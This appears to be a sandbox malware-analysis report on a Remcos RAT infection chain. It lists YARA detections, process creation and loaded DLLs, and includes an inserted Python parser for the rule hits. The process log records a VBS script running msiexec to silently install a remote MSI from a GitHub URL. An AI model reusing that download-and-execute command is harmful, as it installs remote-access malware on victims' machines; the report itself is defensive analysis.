                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
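Added example (not the report's own tooling): a parser for the "Source: …, type: … Matched rule: …" entries above that groups hits by rule and source type and lists the process images whose memory or unpacked images matched a given rule. That second view is what tells an analyst that the Remcos payload lives in cmd.exe and EHttpSrv.exe rather than in the script that started the chain. The input lines are constructed copies of a few entries from this section with the long rule metadata truncated; the assumed layout of Joe Sandbox unpack ids ("<pid>.<run>.<image>.<address>.<n>[.raw].unpack") is this example's inference, not something the report states.

```python
import re
from collections import defaultdict

# Constructed input: copies of a few "Matched rule" entries from this section, with
# the long rule metadata truncated. The extractor's fused form ("MEMORYSTRMatched rule")
# is included so the parser copes with both spellings.
SAMPLE_LINES = [
    "Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa4...",
    "Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS ...",
    "Source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown",
    "Source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown",
    r"Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown",
    r"Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen",
    "Source: 8.2.cmd.exe.33007f8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen",
    "Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown",
    "Some unrelated report line without a rule match",
]

# type is an upper-case token; the optional "|" and whitespace absorb both the clean
# and the fused column layout, and backtracking splits "MEMORYSTRMatched" correctly.
LINE_RE = re.compile(
    r"Source:\s*(?P<source>.+?),\s*type:\s*(?P<type>[A-Z]+)\s*\|?\s*Matched rule:\s*(?P<rule>\S+)"
)
# Process image out of "Process Memory Space: <image> PID: <n>" (MEMORYSTR sources).
PROC_RE = re.compile(r"Process Memory Space:\s*(?P<proc>\S+)\s+PID:\s*\d+")
# Process image out of unpack ids "<pid>.<run>.<image>.<addr>.<n>[.raw].unpack"
# (assumed layout, inferred from the entries in this section).
UNPACK_RE = re.compile(r"^\d+\.\d+\.(?P<proc>.+?\.(?:exe|dll))\.")


def parse_match_line(line):
    """Return {'source', 'type', 'rule'} for a Matched-rule entry, else None."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None


def summarize(lines):
    """rule name -> source type -> set of sources that matched."""
    out = defaultdict(lambda: defaultdict(set))
    for hit in filter(None, map(parse_match_line, lines)):
        out[hit["rule"]][hit["type"]].add(hit["source"])
    return out


def processes_hosting(lines, rule):
    """Lower-cased process images whose memory or unpacked image matched `rule`."""
    procs = set()
    for hit in filter(None, map(parse_match_line, lines)):
        if hit["rule"] != rule:
            continue
        m = PROC_RE.search(hit["source"]) or UNPACK_RE.match(hit["source"])
        if m:
            procs.add(m.group("proc").lower())
    return procs


if __name__ == "__main__":
    for rule, by_type in summarize(SAMPLE_LINES).items():
        kinds = ", ".join(f"{t}={len(s)}" for t, s in sorted(by_type.items()))
        print(f"{rule}: {kinds}")
    print("Remcos code present in:",
          sorted(processes_hosting(SAMPLE_LINES, "Windows_Trojan_Remcos_b296e965")))
```

Dropped-file sources (the DROPPED type) deliberately yield no process name: a file on disk is evidence of staging, while MEMORYSTR and UNPACKEDPE hits are evidence of where the code actually ran, which is the distinction that matters when deciding which processes to collect from a live host.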
                      Source: http_dll.dll.3.dr | Binary string: Software\ESET\ESET Security\CurrentVersion\InfoAppDataDirInstallDirScannerVersionInstallDir32x86\\Device\LanmanRedirector\;%c:Enable@My profileActive${ProfileName}=|NODE;NAME=;TYPE=SUBNODE${PluginID}=Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\ProfilesSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILESDllGetVersioncomctl32.dllInitCommonControlsExUpdateModuleAfterRestartAllowOnlyWhiteListUrlInstallationLevelDontAskForTrustedZoneAllowChangeSignedFilegui_RuleShowLevelAdvancedModegui_SeeApplicationHowRedirectByProxyEnabledPop3sPortsStr995HttpsPortsStr443BlockSslV2SslCompatibleModeAddRootCertToBrowsersSslRootCreateTimePop3sScanModeHttpsScanModeAskIfCertIsNotTrustedAskIfRootCertIsUnknownSslUseModeLearningEndTimeSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES\NODE;NAME=${ProfileName};TYPE=SUBNODE\NODE;NAME=LearningMode;TYPE=SUBNODEHKLM\Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles\${ProfileName}\LearningModeSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES\NODE;NAME=${ProfileName};TYPE=SUBNODE\NODE;NAME=LearningMode;TYPE=SUBNODE\NODE;NAME=UntrustedOut;TYPE=SUBNODEHKLM\Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles\${ProfileName}\LearningMode\UntrustedOutSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES\NODE;NAME=${ProfileName};TYPE=SUBNODE\NODE;NAME=LearningMode;TYPE=SUBNODE\NODE;NAME=UntrustedIn;TYPE=SUBNODEHKLM\Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles\${ProfileName}\LearningMode\UntrustedInSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES\NODE;NAME=${ProfileName};TYPE=SUBNODE\NODE;NAME=LearningMode;TYPE=SUBNODE\NODE;NAME=TrustedOut;TYPE=SUBNODEHKLM\Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles\${ProfileName}\LearningMode\TrustedOutMaxSameRulesAddRemoteAddressAddRemotePortAddLocalPortAddApplicationSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES\NODE;NAME=${ProfileName};TYPE=SUBNODE\NODE;NAME=LearningMode;TYPE=SUBNODE\NODE;NAME=TrustedIn;TYPE=SUBNODEHKLM\Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles\${ProfileName}\LearningMode\TrustedInWriteBlockedToPcapDisplayNameSubjectPublicKeyBlobCertificateCertificatesNode_H^I @
                      Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@34/38@2/3
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_00401580 GetCommandLineW,GetModuleFileNameW,OpenSCManagerW,wcsstr,CreateServiceW,CloseServiceHandle,CloseServiceHandle,RegOpenKeyExW,RegSetValueExW,RegCreateKeyExW,RegCloseKey,RegCloseKey,RegCloseKey,CloseServiceHandle
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_00401580 GetCommandLineW,GetModuleFileNameW,OpenSCManagerW,wcsstr,CreateServiceW,CloseServiceHandle,CloseServiceHandle,RegOpenKeyExW,RegSetValueExW,RegCreateKeyExW,RegCloseKey,RegCloseKey,RegCloseKey,CloseServiceHandle
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_004020D1 CoCreateInstance,MultiByteToWideChar
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_2043AC00 FindResourceW,LoadResource,LockResource,SizeofResource
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_00401550 StartServiceCtrlDispatcherW
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_00401550 StartServiceCtrlDispatcherW,15_2_00401550
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML3D32.tmpJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF5F00B5FE69ED3BD9.TMPJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: http_dll.dll6_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: StartHttpServer6_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: StopHttpServer6_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: -app6_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: http_dll.dll15_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: StartHttpServer15_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: StopHttpServer15_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: -app15_2_00401000
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9BBAE1314E73A4B36581DE9B4621B078
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Updwork.exe "C:\Users\user\AppData\Local\Temp\Updwork.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"
                      Source: unknownProcess created: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe "C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qnJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9BBAE1314E73A4B36581DE9B4621B078Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Updwork.exe "C:\Users\user\AppData\Local\Temp\Updwork.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exeJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exeJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: http_dll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80eng.dllJump to behavior
